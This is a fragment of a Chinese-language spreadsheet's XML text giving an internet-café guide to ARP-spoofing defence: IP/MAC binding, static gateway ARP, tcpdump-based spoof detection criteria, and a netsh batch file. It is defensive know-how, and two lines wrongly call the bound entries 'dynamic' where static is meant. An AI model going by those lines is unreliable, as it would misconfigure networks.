        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>192.168.10.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>留空，如果犯罪程序愚蠢的话让他去攻击空地址吧</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，另外所有客户机的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址及其相关主机信息，只能由网关这里取得，网关这里开通</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DHCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务，但是要给每个网卡，绑定固定唯一</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一定要保持网内的机器</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP/MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一一对应的关系。这样客户机虽然是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DHCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>取地址，但每次开机的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址都是一样的。</t>
    </r>
  </si>
  <si>
    <r>
      <t>3.2.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建立</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据库，把网吧内所有网卡的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址记录下来，每个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、地理位置统统装入数据库，以便及时查询备案。</t>
    </r>
  </si>
  <si>
    <r>
      <t>3.3.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网关机器关闭</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动态刷新的过程，使用静态路邮，这样的话，即使犯罪嫌疑人使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>欺骗攻击网关的话，这样对网关也是没有用的，确保主机安全。</t>
    </r>
  </si>
  <si>
    <r>
      <t>3.4.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网关监听网络安全。网关上面使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TCPDUMP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序截取每个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序包，弄一个脚本分析软件分析这些</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>欺骗攻击的包一般有以下两个特点，满足之一可视为攻击包报警</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第一以太网数据包头的源地址、目标地址和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据包的协议地址不匹配。或者，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据包的发送和目标地址不在自己网络网卡</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据库内，或者与自己网络</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据库</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> MAC/IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不匹配。这些统统第一时间报警，查这些数据包</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以太网数据包</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的源地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>也有可能伪造</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，就大致知道那台机器在发起攻击了。</t>
    </r>
  </si>
  <si>
    <r>
      <t>3.5.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偷偷摸摸的走到那台机器，看看使用人是否故意，还是被任放了什么木马程序陷害的。如果后者，不声不响的找个借口支开他，拔掉网线</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不关机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特别要看看</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Win98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>里的计划任务</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，看看机器的当前使用记录和运行情况，确定是否是在攻击。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可考虑的办法：</t>
    </r>
  </si>
  <si>
    <r>
      <t>4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如果发现断网，</t>
    </r>
  </si>
  <si>
    <r>
      <t>WIN+R&gt;CMD&gt;IPConfig:</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看自己的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址是否被更改；</t>
    </r>
  </si>
  <si>
    <r>
      <t>ARP –a:</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看网关的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是否被更改；</t>
    </r>
  </si>
  <si>
    <r>
      <t>4.2 arp -d</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.3 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>先断开</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>antiarp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>然后再打开，此时可把正确的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址改回来；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.4 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行以下批处理文件：</t>
    </r>
  </si>
  <si>
    <t>@echo off</t>
  </si>
  <si>
    <t>arp -d</t>
  </si>
  <si>
    <t>netsh -c "i i" add neighbors 10 "192.168.1.1" "00-21-27-b2-eb-96"</t>
  </si>
  <si>
    <t>netsh -c "i i" add neighbors 10 "192.168.1.100" "00-1f-16-68-ea-b7"</t>
  </si>
  <si>
    <r>
      <t>（将网关和自己网卡的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绑定（即由动态变为动态））</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.5 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>禁用本地连接，启用本地连接</t>
    </r>
  </si>
  <si>
    <r>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令</t>
    </r>
  </si>
  <si>
    <r>
      <t>1 ARP -a:</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓存，包括网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；</t>
    </r>
  </si>
  <si>
    <r>
      <t>2 ARP -D</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：清空</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓存；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3 ARP -S </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">IP </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：手工将网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和正确的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绑定（未绑定前是动态的，绑定后则会变成动态了）；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Netsh </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是命令行脚本实用工具，它允许从本地或远程显示或修改当前正在运行的计算机的网络配置。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Netsh </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>还提供了一个脚本功能，对于指定计算机，可以通过此功能以批处理模式运行一组命令。为了存档或配置其他服务器，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Netsh </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>也可以将配置脚本保存在文本文件中。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>只要利用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Netsh</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令，进入到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下的网络配置状态，就能实现各种网络配置。</t>
    </r>
  </si>
  <si>
    <r>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环境中，设置网络参数之前，必须先进入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置模式才可以。先打开系统运行对话框，执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">CMD </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令，将主界面切换到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环境中，在命令行中输入“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Netsh</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令，单击回车键后，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令提示符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将自动变为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netsh&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，再依次执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Interface</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>|</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令后，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
